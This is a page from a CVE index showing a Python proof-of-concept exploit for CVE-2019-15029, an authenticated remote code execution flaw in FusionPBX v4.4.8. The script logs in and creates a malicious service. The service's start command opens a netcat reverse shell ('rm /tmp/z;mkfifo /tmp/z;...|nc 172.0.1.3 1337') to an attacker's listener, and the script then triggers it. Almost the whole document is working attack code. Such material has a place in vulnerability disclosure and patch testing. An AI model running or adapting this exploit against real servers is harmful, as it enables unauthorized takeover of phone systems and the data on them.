4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-15029
README.md
Rendering markdown...
POC / FusionPBX-exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/python3
 
'''
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''
 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
 
# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
 
    exit()
 
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
 
 
request = requests.session()
 
login_info = {
    "username": username,
    "password": password
}
 
login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
     login_info, verify=False
 )
 
 
if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")
 
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
    # the service name you want to create
    "service_name":"PwnedService3",
    "service_type":"pid",
    "service_data":"1",
 
    # this value contains the payload , you can change it as you want
    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop":"stop",
    "service_description":"desc",
    "submit":"Save"
}
 
request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
 
soup = BeautifulSoup(html_page.text, "lxml")
 
for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break
 
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)